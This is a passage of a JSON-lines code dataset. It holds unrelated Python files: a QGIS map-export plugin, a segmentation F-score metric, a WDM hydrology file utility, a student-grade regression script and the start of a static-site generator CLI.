vect.filePath, objName, self.simplification, idAttribute, preserveAttributes)\n \n hasTip = vect.main and self.popup \n hasViz = vect.main and self.hasViz\n outlineWidth = syms.getAvergageOutlineWidth() \n \n # Store the QgsVectorLayer symbols in a single list now that the the average outline width has been calculated\n symbols.extend(syms)\n \n tick+=1\n progress.setValue(tick) \n \n outVars.outputLayers.append(outputLayer(objName, name, outlineWidth, vect.main, hasTip, hasViz, syms))\n \n if self.legend and vect.main:\n # Create the legend for the main layer\n self.writeLegendFile(uid, syms) \n \n tick+=1\n progress.setValue(tick) \n \n # Write symbol styles\n self.writeCss(uid, symbols, labels) \n \n # Copy any external SVG files\n self.copyImgFiles(uid, symbols)\n \n # Alter the index file\n n = self.getDestIndexFile(uid)\n \n self.selectedFormat.writeIndexFile(n, outVars, bbox, self.selectedProjection, self.__selectedFields, labels)\n tick+=1\n progress.setValue(tick)\n \n ''''Order of things is important\n writeDataFile() appends an ID field if not already in the popup\n Would result in the popup template potentially having an unexpected ID field'''\n if self.popup == True or self.hasViz == True:\n self.__logger.info(\"EXPORT popup data\")\n # Create the data files\n self.writeDataFile(uid) \n \n # Now zip up the shapefiles\n self.zipShpFiles(uid)\n \n self.__logger.info(\"EXPORT complete =========================================================\")\n \n tick+=1\n progress.setValue(tick)\n \n # start browser\n webbrowser.open_new_tab(\"{0}{1}/index.html\".format(webServerUrl, uid))\n \n \nclass vector:\n \"\"\"Base class for the layer abstracting away the QGIS details\"\"\"\n \n def __init__(self, iface, layer):\n \"\"\"Initialise the layer\"\"\"\n \n self.rendererType = 0\n self.id = layer.id()\n self.name = layer.name()\n self.layer = layer\n self.filePath = \"\"\n self.main = False\n self.extra = iface.legendInterface().isLayerVisible(layer)\n self.type = layer.type()\n self.fields = []\n self.vizFields = []\n self.defaultId = \"\" \n\n \n self.isVisible = iface.legendInterface().isLayerVisible(layer) \n self.transparency = 1 - (float(layer.layerTransparency()) / 100)\n for f in layer.pendingFields():\n # Add to the list of fields\n self.fields.append(f.name()) \n \n # Add numeric fields to the list for visualization\n if f.typeName().lower() == \"integer\" or f.typeName().lower() == \"real\" or f.typeName().lower() == \"integer64\":\n self.vizFields.append(f.name())\n \n # An ID field? Set the default for the ID field option \n upper = f.name().upper() \n if upper == \"ID\" or upper == \"OBJECT_ID\" or upper == \"OBJECTID\":\n self.defaultId = f.name()\n \n \n renderer = layer.rendererV2()\n dump = renderer.dump()\n \n \n if dump[0:6] == \"SINGLE\":\n self.rendererType = 0 \n elif dump[0:11] == \"CATEGORIZED\":\n self.rendererType = 1 \n elif dump[0:9] == \"GRADUATED\":\n self.redererType = 2\n \n def isSingleRenderer(self):\n \"\"\"Is this a single renderer type?\"\"\"\n return self.rendererType == 0\n \n ","sub_path":"logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":35457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"149673228","text":"# Author: Yahui Liu \n\n\"\"\"\nCalculate sensitivity and specificity metrics:\n - Precision\n - Recall\n - F-score\n\"\"\"\n\nimport numpy as np\n\nfrom tqdm import tqdm\n\n\ndef cal_ois_metrics(pred_list, gt_list, thresh_step=0.01):\n final_accuracy_all = []\n for pred, gt in zip(pred_list, gt_list):\n statistics = []\n for thresh in np.arange(0.0, 1.0, thresh_step):\n gt_img = (gt / 255).astype('uint8')\n pred_img = (pred / 255 > thresh).astype('uint8')\n tp,fp,fn = get_statistics(pred_img, gt_img)\n p_acc = 1.0 if tp == 0 and fp == 0 else tp / (tp + fp)\n r_acc = tp / (tp + fn)\n # print(r_acc+ p_acc)\n # print(2 * p_acc * r_acc / (p_acc + r_acc))\n if p_acc + r_acc == 0:\n f1 = 0\n else:\n f1 = 2 * p_acc * r_acc / (p_acc + r_acc)\n statistics.append([thresh,f1])\n max_f = np.amax(statistics, axis=0)\n final_accuracy_all.append(max_f[1])\n return np.mean(final_accuracy_all)\n\ndef get_statistics(pred, gt):\n \"\"\"\n return tp, fp, fn\n \"\"\"\n tp = np.sum((pred == 1) & (gt == 1))\n fp = np.sum((pred == 1) & (gt == 0))\n fn = np.sum((pred == 0) & (gt == 1))\n return [tp, fp, fn]\n","sub_path":"evalauation/calculate_OIS.py","file_name":"calculate_OIS.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"608676835","text":"#!/usr/bin/env python2\n\"\"\"Utilities to work with WDM files.\n\nThe WDM class supplies a series of utilities for working with WDM files\nwith Python. The class uses f2py to wrap the minimally necessary WDM\nroutines.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport datetime\nimport os\nimport os.path\nimport re\n\nimport pandas as pd\n\nfrom lockfile import LockFile\n\nimport _wdm_lib\nfrom tstoolbox import tsutils\n\n# Load in WDM subroutines\n\n# Mapping between WDM TCODE and pandas interval code\nMAPTCODE = {\n 1: 'S',\n 2: 'T',\n 3: 'H',\n 4: 'D',\n 5: 'MS',\n 6: 'AS',\n}\n\nMAPFREQ = {\n 'S': 1,\n 'T': 2,\n 'H': 3,\n 'D': 4,\n 'M': 5,\n 'A': 6,\n}\n\n\nclass WDMError(Exception):\n \"\"\"The default Error class.\"\"\"\n\n pass\n\n\nclass DSNDoesNotExist(Exception):\n \"\"\"The Error class if DSN does no exist.\"\"\"\n\n def __init__(self, dsn):\n \"\"\"Initialize DSN number.\"\"\"\n self.dsn = dsn\n\n def __str__(self):\n \"\"\"Print detailed error message.\"\"\"\n if self.dsn < 1 or self.dsn > 32000:\n return \"\"\"\n*\n* The DSN number must be >= 1 and <= 32000.\n* You supplied {0}.\n*\n\"\"\".format(self.dsn)\n\n return \"\"\"\n*\n* The DSN {0} does not exist in the dataset.\n*\n\"\"\".format(self.dsn)\n\n\nclass WDMFileExists(Exception):\n \"\"\"Error class if WDM file exist.\"\"\"\n\n def __init__(self, filename):\n \"\"\"Initialize filename.\"\"\"\n self.filename = filename\n\n def __str__(self):\n \"\"\"Return detailed error message.\"\"\"\n return \"\"\"\n*\n* File {0} exists.\n*\n\"\"\".format(self.filename)\n\n\nclass DSNExistsError(Exception):\n \"\"\"Error class if DSN exist.\"\"\"\n\n def __init__(self, dsn):\n \"\"\"Initialize DSN.\"\"\"\n self.dsn = dsn\n\n def __str__(self):\n \"\"\"Return detailed error message.\"\"\"\n return \"\"\"\n*\n* DSN {0} exists.\n*\n\"\"\".format(self.dsn)\n\n\nclass WDM(object):\n \"\"\"Class to open and read from WDM files.\"\"\"\n\n def __init__(self):\n \"\"\"Set functions from WDM library to class function objects.\"\"\"\n # timcvt: Convert times to account for 24 hour\n # timdif: Time difference\n # wdmopn: Open WDM file\n # wdbsac: Set string attribute\n # wdbsai: Set integer attribute\n # wdbsar: Set real attribute\n # wdbckt: Check if DSN exists\n # wdflcl: Close WDM file\n # wdlbax: Create label for new DSN\n # wdtget: Get time-series data\n # wdtput: Write time-series data\n # wddsrn: Renumber a DSN\n # wddsdl: Delete a DSN\n # wddscl: Copy a label\n\n self.timcvt = _wdm_lib.timcvt\n self.timdif = _wdm_lib.timdif\n self.wdbopn = _wdm_lib.wdbopn\n self.wdbsac = _wdm_lib.wdbsac\n self.wdbsai = _wdm_lib.wdbsai\n self.wdbsar = _wdm_lib.wdbsar\n self.wdbsgc = _wdm_lib.wdbsgc\n self.wdbsgi = _wdm_lib.wdbsgi\n self.wdbsgr = _wdm_lib.wdbsgr\n self.wdckdt = _wdm_lib.wdckdt\n self.wdflcl = _wdm_lib.wdflcl\n self.wdlbax = _wdm_lib.wdlbax\n self.wdtget = _wdm_lib.wdtget\n self.wdtput = _wdm_lib.wdtput\n self.wtfndt = _wdm_lib.wtfndt\n self.wddsrn = _wdm_lib.wddsrn\n self.wddsdl = _wdm_lib.wddsdl\n self.wddscl = _wdm_lib.wddscl\n\n self.openfiles = {}\n\n def wmsgop(self):\n \"\"\"WMSGOP is a simple open of the message file.\"\"\"\n afilename = os.path.join(os.path.dirname(__file__),\n 'message.wdm')\n return self._open(afilename, 50, ronwfg=1)\n\n def dateconverter(self, datestr):\n \"\"\"Extract and convert dates.\n\n Extract all of the grouped numbers out of a string\n to create an array suitable for dates and times.\n \"\"\"\n words = re.findall(r'\\d+', str(datestr))\n words = [int(i) for i in words]\n dtime = [1900, 1, 1, 0, 0, 0]\n dtime[:len(words)] = words\n return pd.np.array(dtime)\n\n def _open(self, wdname, wdmsfl, ronwfg=0):\n \"\"\"Private method to open WDM file.\"\"\"\n wdname = wdname.strip()\n if wdname not in self.openfiles:\n if ronwfg == 1:\n if not os.path.exists(wdname):\n raise ValueError(\"\"\"\n*\n* Trying to open\n* {0}\n* in read-only mode and it cannot be found.\n*\n \"\"\".format(wdname))\n retcode = self.wdbopn(wdmsfl,\n wdname,\n ronwfg)\n self._retcode_check(retcode, additional_info='wdbopn')\n self.openfiles[wdname] = wdmsfl\n return wdmsfl\n\n def _retcode_check(self, retcode, additional_info=' '):\n \"\"\"Central place to run through the return code.\"\"\"\n if retcode == 0:\n return\n retcode_dict = {\n -1: 'non specific error on WDM file open',\n -4: \"\"\"copy/update failed due to data overlap problem - part of\n source needed\"\"\",\n -5: 'copy/update failed due to data overlap problem',\n -6: 'no data present',\n -8: 'bad dates',\n -9: 'data present in current group',\n -10: 'no date in this group',\n -11: 'no non-missing data, data has not started yet',\n -14: 'data specified not within valid range for data set',\n -15: \"\"\"time units and time step must match label exactly with\n VBTIME = 1\"\"\",\n -20: \"\"\"problem with one or more of\n GPGLG, DXX, NVAL, QUALVL, LTSTEP, LTUNIT\"\"\",\n -21: 'data from WDM does not match expected date',\n -23: 'not a valid table',\n -24: 'not a valid associated table',\n -25: 'template already exists',\n -26: 'can not add another table',\n -27: 'no tables to return info about',\n -28: 'table does not exist yet',\n -30: 'more than whole table',\n -31: 'more than whole extension',\n -32: 'data header does not match',\n -33: 'problems with row/space specs',\n -36: 'missing needed following data for a get',\n -37: 'no data present',\n -38: 'missing part of time required',\n -39: 'missing data group',\n -40: 'no data available',\n -41: 'no data to read',\n -42: 'overlap in existing group',\n -43: 'can not add another space time group',\n -44: 'trying to get/put more data that in block',\n -45: 'types do not match',\n -46: 'bad space time group specification parameter',\n -47: 'bad direction flag',\n -48: 'conflicting spec of space time dim and # of ts data sets',\n -49: 'group does not exist',\n -50: 'requested attributes missing from this data set',\n -51: 'no space for another DLG',\n -61: 'old data set does not exist',\n -62: 'new data set already exists',\n -71: 'data set already exists',\n -72: 'old data set does not exist',\n -73: 'new data set already exists',\n -81: 'data set does not exist',\n -82: 'data set exists, but is wrong DSTYP',\n -83: 'WDM file already open, can not create it',\n -84: 'data set number out of valid range',\n -85: 'trying to write to a read-only data set',\n -87: 'can not remove message WDM file from buffer',\n -88: 'can not open another WDM file',\n -89: 'check digit on 1st record of WDM file is bad',\n -101: 'incorrect character value for attribute',\n -102: 'attribute already on label',\n -103: 'no room on label for attribute',\n -104: 'data present, can not update attribute',\n -105: 'attribute not allowed for this type data set',\n -106: 'can not delete attribute, it is required',\n -107: 'attribute not present on this data set',\n -108: 'incorrect integer value for attribute',\n -109: 'incorrect real value for attribute',\n -110: 'attributes not found on message file',\n -111: 'attribute name not found (no match)',\n -112: 'more attributes exists which match SAFNAM',\n -121: 'no space for another attribute',\n 1: 'varies - generally more data/groups/table',\n 2: 'no more data available for this DLG group'\n }\n\n if retcode in retcode_dict:\n lopenfiles = self.openfiles.copy()\n for fn in lopenfiles:\n self._close(fn)\n raise WDMError(\"\"\"\n*\n* WDM library function returned error code {0}. {1}\n* WDM error: {2}\n*\n\"\"\".format(retcode, additional_info, retcode_dict[retcode]))\n if retcode != 0:\n for fn in self.openfiles:\n self._close(fn)\n raise WDMError(\"\"\"\n*\n* WDM library function returned error code {0}. {1}\n*\n\"\"\".format(retcode, additional_info))\n\n def renumber_dsn(self, wdmpath, odsn, ndsn):\n \"\"\"Will renumber the odsn to the ndsn.\"\"\"\n odsn = int(odsn)\n ndsn = int(ndsn)\n\n lock = LockFile(wdmpath)\n lock.acquire()\n wdmfp = self._open(wdmpath, 51)\n retcode = self.wddsrn(\n wdmfp,\n odsn,\n ndsn)\n lock.release()\n self._close(wdmpath)\n self._retcode_check(retcode, additional_info='wddsrn')\n\n def delete_dsn(self, wdmpath, dsn):\n \"\"\"Function to delete a DSN.\"\"\"\n dsn = int(dsn)\n\n lock = LockFile(wdmpath)\n lock.acquire()\n wdmfp = self._open(wdmpath, 52)\n testreturn = self.wdckdt(wdmfp, dsn)\n self._close(wdmpath)\n if testreturn != 0:\n wdmfp = self._open(wdmpath, 52)\n retcode = self.wddsdl(wdmfp,\n dsn)\n self._close(wdmpath)\n self._retcode_check(retcode, additional_info='wddsdl')\n lock.release()\n self._close(wdmpath)\n\n def copydsnlabel(self, inwdmpath, indsn, outwdmpath, outdsn):\n \"\"\"Will copy a complete DSN label from one DSN to another.\"\"\"\n assert inwdmpath != outwdmpath\n indsn = int(indsn)\n outdsn = int(outdsn)\n dsntype = 0\n inwdmfp = self._open(inwdmpath, 53, ronwfg=1)\n lock = LockFile(outwdmpath)\n lock.acquire()\n outwdmfp = self._open(outwdmpath, 54)\n retcode = self.wddscl(inwdmfp,\n indsn,\n outwdmfp,\n outdsn,\n dsntype)\n self._close(inwdmpath)\n lock.release()\n self._close(outwdmpath)\n self._retcode_check(retcode, additional_info='wddscl')\n\n def describe_dsn(self, wdmpath, dsn):\n \"\"\"Will collect some metadata about the DSN.\"\"\"\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n _, llsdat, lledat, retcode = self.wtfndt(\n wdmfp,\n dsn,\n 1) # GPFLG - get(1)/put(2) flag\n self._close(wdmpath)\n # Ignore retcode == -6 which means that the dsn doesn't have any data.\n # It it is a new dsn, of course it doesn't have any data.\n if retcode == -6:\n retcode = 0\n self._retcode_check(retcode, additional_info='wtfndt')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n tstep, retcode = self.wdbsgi(\n wdmfp,\n dsn,\n 33, # saind = 33 for time step\n 1) # salen\n self._close(wdmpath)\n self._retcode_check(retcode, additional_info='wdbsgi')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n tcode, retcode = self.wdbsgi(\n wdmfp,\n dsn,\n 17, # saind = 17 for time code\n 1) # salen\n self._close(wdmpath)\n self._retcode_check(retcode, additional_info='wdbsgi')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n tsfill, retcode = self.wdbsgr(\n wdmfp,\n dsn,\n 32, # saind = 32 for tsfill\n 1) # salen\n self._close(wdmpath)\n # retcode = -107 if attribute not present\n if retcode == -107:\n # Since I use tsfill if not found will set to default.\n tsfill = -999.0\n retcode = 0\n else:\n tsfill = tsfill[0]\n self._retcode_check(retcode, additional_info='wdbsgr')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n ostr, retcode = self.wdbsgc(\n wdmfp,\n dsn,\n 290, # saind = 290 for location\n 8) # salen\n self._close(wdmpath)\n if retcode == -107:\n ostr = ''\n retcode = 0\n self._retcode_check(retcode, additional_info='wdbsgr')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n scen_ostr, retcode = self.wdbsgc(\n wdmfp,\n dsn,\n 288, # saind = 288 for scenario\n 8) # salen\n self._close(wdmpath)\n if retcode == -107:\n scen_ostr = ''\n retcode = 0\n self._retcode_check(retcode, additional_info='wdbsgr')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n con_ostr, retcode = self.wdbsgc(\n wdmfp,\n dsn,\n 289, # saind = 289 for constitiuent\n 8) # salen\n self._close(wdmpath)\n if retcode == -107:\n con_ostr = ''\n retcode = 0\n self._retcode_check(retcode, additional_info='wdbsgr')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n base_year, retcode = self.wdbsgi(\n wdmfp,\n dsn,\n 27, # saind = 27 for base_year\n 1) # salen\n self._close(wdmpath)\n self._retcode_check(retcode, additional_info='wdbsgi')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n desc_ostr, retcode = self.wdbsgc(\n wdmfp,\n dsn,\n 45, # saind = 45 for description\n 48) # salen\n self._close(wdmpath)\n if retcode == -107:\n desc_ostr = ''\n retcode = 0\n self._retcode_check(retcode, additional_info='wdbsgc')\n\n wdmfp = self._open(wdmpath, 55, ronwfg=1)\n tstype, retcode = self.wdbsgc(\n wdmfp,\n dsn,\n 1, # saind = 1 for tstype\n 4) # salen\n self._close(wdmpath)\n if retcode == -107:\n tstype = ''\n retcode = 0\n self._retcode_check(retcode, additional_info='wdbsgc')\n\n self.timcvt(llsdat)\n self.timcvt(lledat)\n try:\n sdate = datetime.datetime(*llsdat).date()\n except ValueError:\n sdate = None\n try:\n edate = datetime.datetime(*lledat).date()\n except ValueError:\n edate = None\n\n dateFormat_dict = {1: \"S\",\n 2: \"T\",\n 3: \"H\",\n 4: \"D\",\n 5: \"M\",\n 6: \"A\"}\n\n tstep = tstep[0]\n tcode = tcode[0]\n base_year = base_year[0]\n\n try:\n ostr = str(ostr, \"utf-8\").strip()\n scen_ostr = str(scen_ostr, \"utf-8\").strip()\n con_ostr = str(con_ostr, \"utf-8\").strip()\n desc_ostr = str(desc_ostr, \"utf-8\").strip()\n tstype = str(tstype, \"utf-8\").strip()\n except TypeError:\n ostr = ''.join(ostr).strip()\n scen_ostr = ''.join(scen_ostr).strip()\n con_ostr = ''.join(con_ostr).strip()\n desc_ostr = ''.join(desc_ostr).strip()\n tstype = ''.join(tstype).strip()\n\n return {'dsn': dsn,\n 'start_date': pd.Period(sdate, freq=dateFormat_dict[tcode]),\n 'end_date': pd.Period(edate, freq=dateFormat_dict[tcode]),\n 'llsdat': llsdat,\n 'lledat': lledat,\n 'tstep': tstep,\n 'tcode': tcode,\n 'tcode_name': MAPTCODE[tcode],\n 'location': ostr.strip(),\n 'scenario': scen_ostr.strip(),\n 'constituent': con_ostr.strip(),\n 'tsfill': tsfill,\n 'description': desc_ostr,\n 'base_year': base_year,\n 'tstype': tstype}\n\n def create_new_wdm(self, wdmpath, overwrite=False):\n \"\"\"Create a new WDM fileronwfg.\"\"\"\n if overwrite and os.path.exists(wdmpath):\n self._close(wdmpath)\n os.remove(wdmpath)\n elif os.path.exists(wdmpath):\n raise WDMFileExists(wdmpath)\n ronwfg = 2\n self._open(wdmpath, 56, ronwfg=ronwfg)\n self._close(wdmpath)\n\n def set_dsn_attribute(self, wdmpath, dsn, attribute=None):\n \"\"\"Set DSN attributes.\"\"\"\n pass\n\n def create_new_dsn(self, wdmpath, dsn, tstype='', base_year=1900, tcode=4,\n tsstep=1, statid=' ', scenario='', location='',\n description='', constituent='', tsfill=-999.0):\n \"\"\"Create self.wdmfp/dsn.\"\"\"\n lock = LockFile(wdmpath)\n lock.acquire()\n wdmfp = self._open(wdmpath, 57)\n messfp = self.wmsgop()\n\n if self.wdckdt(wdmfp, dsn) == 1:\n self._close(wdmpath)\n raise DSNExistsError(dsn)\n\n # Parameters for wdlbax taken from ATCTSfile/clsTSerWDM.cls\n self.wdlbax(\n wdmfp,\n dsn,\n 1, # DSTYPE - always 1 for time series\n 10, # NDN - number of down pointers\n 10, # NUP - number of up pointers\n 30, # NSA - number of search attributes\n 100, # NSASP - amount of search attribute space\n 300, # NDP - number of data pointers\n ) # PSA - pointer to search attribute space\n\n for saind, salen, saval in [(34, 1, 6), # tgroup\n (83, 1, 1), # compfg\n (84, 1, 1), # tsform\n (85, 1, 1), # vbtime\n (17, 1, int(tcode)), # tcode\n (33, 1, int(tsstep)), # tsstep\n (27, 1, int(base_year)), # tsbyr\n ]:\n retcode = self.wdbsai(\n wdmfp,\n dsn,\n messfp,\n saind,\n salen,\n saval)\n self._retcode_check(retcode, additional_info='wdbsai')\n\n for saind, salen, saval in [(32, 1, tsfill)]: # tsfill\n retcode = self.wdbsar(\n wdmfp,\n dsn,\n messfp,\n saind,\n salen,\n saval)\n self._retcode_check(retcode, additional_info='wdbsar')\n\n for saind, salen, saval, error_name in [\n (2, 16, statid, 'Station ID'),\n (1, 4, tstype.upper(), 'Time series type - tstype'),\n (45, 48, description.upper(), 'Description'),\n (288, 8, scenario.upper(), 'Scenario'),\n (289, 8, constituent.upper(), 'Constituent'),\n (290, 8, location.upper(), 'Location'),\n ]:\n saval = saval.strip()\n if len(saval) > salen:\n raise ValueError(\"\"\"\n*\n* String \"{0}\" is too long for {1}. Must\n* have a length equal or less than {2}.\n*\n\"\"\".format(saval, error_name, salen))\n\n saval = '{0: <{1}}'.format(saval, salen)\n\n retcode = self.wdbsac(\n wdmfp,\n dsn,\n messfp,\n saind,\n salen,\n saval)\n self._retcode_check(retcode, additional_info='wdbsac')\n lock.release()\n self._close(wdmpath)\n\n def _tcode_date(self, tcode, date):\n \"\"\"Use tcode to set the significant parts of the date tuple.\"\"\"\n rdate = [1, 1, 1, 0, 0, 0]\n if tcode <= 6:\n rdate[0] = date[0]\n if tcode <= 5:\n rdate[1] = date[1]\n if tcode <= 4:\n rdate[2] = date[2]\n if tcode <= 3:\n rdate[3] = date[3]\n if tcode <= 2:\n rdate[4] = date[4]\n if tcode <= 1:\n rdate[5] = date[5]\n return rdate\n\n def write_dsn(self, wdmpath, dsn, data):\n \"\"\"Write to self.wdmfp/dsn the time-series data.\"\"\"\n dsn_desc = self.describe_dsn(wdmpath, dsn)\n tcode = dsn_desc['tcode']\n tstep = dsn_desc['tstep']\n tsfill = dsn_desc['tsfill']\n\n data.fillna(tsfill, inplace=True)\n start_date = data.index[0]\n\n dstart_date = start_date.timetuple()[:6]\n llsdat = self._tcode_date(tcode, dstart_date)\n if dsn_desc['base_year'] > llsdat[0]:\n raise ValueError(\"\"\"\n*\n* The base year for this DSN is {0}. All data to insert must be after the\n* base year. Instead the first year of the series is {1}.\n*\n\"\"\".format(dsn_desc['base_year'], llsdat[0]))\n\n nval = len(data)\n lock = LockFile(wdmpath)\n lock.acquire()\n wdmfp = self._open(wdmpath, 58)\n retcode = self.wdtput(\n wdmfp,\n dsn,\n tstep,\n llsdat,\n nval,\n 1,\n 0,\n tcode,\n data)\n lock.release()\n self._close(wdmpath)\n self._retcode_check(retcode, additional_info='wdtput')\n\n def read_dsn(self, wdmpath, dsn, start_date=None, end_date=None):\n \"\"\"Read from a DSN.\"\"\"\n if not os.path.exists(wdmpath):\n raise ValueError(\"\"\"\n***\n*** {0} does not exist.\n***\n\"\"\".format(wdmpath))\n\n # Call wdatim_ to get LLSDAT, LLEDAT, TSTEP, TCODE\n desc_dsn = self.describe_dsn(wdmpath, dsn)\n\n llsdat = desc_dsn['llsdat']\n lledat = desc_dsn['lledat']\n tcode = desc_dsn['tcode']\n tstep = desc_dsn['tstep']\n tsfill = desc_dsn['tsfill']\n\n # These calls convert 24 to midnight of the next day\n self.timcvt(llsdat)\n self.timcvt(lledat)\n\n if start_date is not None:\n start_date = self.dateconverter(start_date)\n start_date = datetime.datetime(*start_date)\n if start_date > datetime.datetime(*lledat):\n raise ValueError(\"\"\"\n*\n* The requested start date ({0}) is after the end date ({1})\n* of the time series in the WDM file.\n*\n\"\"\".format(start_date, datetime.datetime(*lledat)))\n\n if end_date is not None:\n end_date = self.dateconverter(end_date)\n end_date = datetime.datetime(*end_date)\n if end_date < datetime.datetime(*llsdat):\n raise ValueError(\"\"\"\n*\n* The requested end date ({0}) is before the start date ({1})\n* of the time series in the WDM file.\n*\n\"\"\".format(end_date, datetime.datetime(*llsdat)))\n\n iterm = self.timdif(llsdat,\n lledat,\n tcode,\n tstep)\n\n dtran = 0\n qualfg = 30\n # Get the data and put it into dictionary\n wdmfp = self._open(wdmpath, 59, ronwfg=1)\n dataout, retcode = self.wdtget(\n wdmfp,\n dsn,\n tstep,\n llsdat,\n iterm,\n dtran,\n qualfg,\n tcode)\n self._close(wdmpath)\n self._retcode_check(retcode, additional_info='wdtget')\n\n index = pd.date_range(datetime.datetime(*llsdat),\n periods=iterm,\n freq='{0:d}{1}'.format(tstep, MAPTCODE[tcode]))\n\n # Convert time series to pandas DataFrame\n tmpval = pd.DataFrame(\n pd.Series(\n dataout,\n index=index,\n name='{0}_DSN_{1}'.format(\n os.path.basename(wdmpath), dsn)), dtype=pd.np.float64)\n\n tmpval = tsutils.common_kwds(tmpval,\n start_date=start_date,\n end_date=end_date)\n tmpval.replace(tsfill, pd.np.nan, inplace=True)\n tmpval.index.name = 'Datetime'\n return tmpval\n\n def read_dsn_por(self, wdmpath, dsn):\n \"\"\"Read the period of record for a DSN.\"\"\"\n return self.read_dsn(wdmpath, dsn, start_date=None, end_date=None)\n\n def _close(self, wdmpath):\n \"\"\"Close the WDM file.\"\"\"\n wdmpath = wdmpath.strip()\n if wdmpath in self.openfiles:\n retcode = self.wdflcl(self.openfiles[wdmpath])\n self._retcode_check(retcode, additional_info='wdflcl')\n self.openfiles.pop(wdmpath)\n\n\nif __name__ == '__main__':\n wdm_obj = WDM()\n fname = 'test.wdm'\n if os.name == 'nt':\n fname = r'c:\\test.wdm'\n wdm_obj.create_new_wdm(fname, overwrite=True)\n listonumbers = [34.2, 35.0, 36.9, 38.2, 40.2, 20.1, 18.4, 23.6]\n wdm_obj.create_new_dsn(fname,\n 1003,\n tstype='EXAM',\n scenario='OBSERVED',\n tcode=4,\n location='EXAMPLE')\n dr = pd.date_range(start='2000-01-01', freq='D', periods=len(listonumbers))\n df = pd.DataFrame(listonumbers, index=dr)\n wdm_obj.write_dsn(fname, 1003, df)\n print(wdm_obj.read_dsn_por(fname, 1003))\n","sub_path":"wdmtoolbox/wdmutil.py","file_name":"wdmutil.py","file_ext":"py","file_size_in_byte":25340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"292320867","text":"import tensorflow\nimport keras\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as pyplot\nimport pickle\nfrom matplotlib import style\nimport sklearn\nfrom sklearn import linear_model\n\n\ndata = pd.read_csv(\"student-mat.csv\", sep=\";\")\n\ndata = data[[\"G1\", \"G2\", \"G3\", \"studytime\", \"failures\", \"absences\"]]\n\npredict = \"G3\"\n\nx = np.array(data.drop([predict], 1))\ny = np.array(data[predict])\n\nx_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(x, y, test_size=0.1)\n\nlinear = linear_model.LinearRegression()\n\nlinear.fit(x_train, y_train)\nacc = linear.score(x_test, y_test)\nprint(acc, \"\\n\") # accuracy when compared to test set.\nprint(\"------\\n\")\n\n# save trained model\nwith open(\"../models/studentmodel.pickle\", \"wb\") as f:\n pickle.dump(linear, f)\n\n# load trained model\npickle_in = open(\"../models/studentmodel.pickle\", \"rb\")\nlinear = pickle.load(pickle_in)\n\nprint(\"Coefficient: \", linear.coef_,\"\\n\")\nprint(\"Intercept: \", linear.intercept_,\"\\n\")\n\ndata_head = [\"Predicted\", \"G1\", \"G2\", \"G3\", \"studytime\", \"failures\", \"absences\", \"actual\"]\n\npredictions = linear.predict(x_test)\nfor x in range (len(predictions)):\n print(data_head)\n print(predictions[x], x_test[x], y_test[x], '\\n')\n\np = \"G1\"\nstyle.use(\"ggplot\")\npyplot.scatter(data[p], data[\"G3\"])\npyplot.xlabel(p)\npyplot.ylabel(\"Final grade\")\npyplot.show()","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"591003422","text":"#!/usr/bin/python3\n#encoding: utf-8\n\nimport argparse\nfrom sys import argv, exit\nfrom shutil import copyfile\nfrom datetime import date\n\nimport cobra\n\ndef main(argv):\n\t\"\"\"\n\tParse our arguments\n\t\"\"\"\n\n\tparser = argparse.ArgumentParser(description=\"CobraPress Version 0.0.3\")\n\tparser.add_argument(\"--generate\", help=\"Generate the static html\", action=\"store_true\")\n\tparser.add_argument(\"--init\", help=\"Initialize this installation\", action=\"store_true\")\n\tparser.add_argument(\"--new_post\", help=\"Generate a new post\", action=\"store_true\")\n\tparser.add_argument(\"--list\", help=\"List available arguments\", action=\"store_true\")\n\targs = parser.parse_args()\n\n\tif args.generate:\n\t\tgenerate()\n\telif args.init:\n\t\tinitialize()\n\telif args.new_post:\n\t\tnew_post(args.new_post)\n\telif args.list:\n\t\tparser.print_usage()\n\telse:\n\t\tparser.print_help()\n\t\n\treturn\n\ndef generate():\n\t\"\"\"\n\tGenerate the static html\n\t\"\"\"\n\n\tconfig = readconfig()\n\n\tprint(config)\n\tfrom cobra import generate\n\tgenerate.generate(config).generate_html()\n\tprint(\"Done!\")\n\treturn\n\ndef initialize():\n\t\"\"\"\n\tInitialize this installtion\n\t\"\"\"\n\n\tcopyfile(\"_config.py\", \"config.py\")\n\t# Prepend some stuff to a new config\n\tf = open(\"_config.py\", 'r')\n\tconfig = f.read()\n\tf.close()\n\n\tf = open(\"config.py\", 'w')\n\tf.write(\"# Use this file to override configurations made in _config.py\\n\\n\")\n\tf.write(config)\n\tf.close()\n\tprint(\"Done!\")\n\treturn\n\ndef new_post(title):\n\t\"\"\"\n\tGenerate a new post\n\t\"\"\"\n\n\tif title == True:\n\t\tprint(\"What's the title?\")\n\t\ttitle = input(\"Title: \")\n\n\tfilename = str(date.today().year)+\"-\"+str(date.today().month)+\"-\"+str(date.today().day)+\"-\"+title\n\tpost = open(\"posts/\"+filename, 'a')\n\tpost.write(\"++++\\nTitle: \\\"\" + title + \"\\\"\\nPublish: True\\n++++\")\n\tpost.close\n\n\tprint(title)\n\tprint(\"Done!\")\n\treturn\n\ndef readconfig():\n\t\"\"\"\n\tRead the config\n\t\"\"\"\n\n\tconfiguration = {}\n\n\timport _config\n\ttry:\n\t\timport config\n\texcept ImportError:\n\t\tprint(\"No config file found!\\nDid you \\\"make 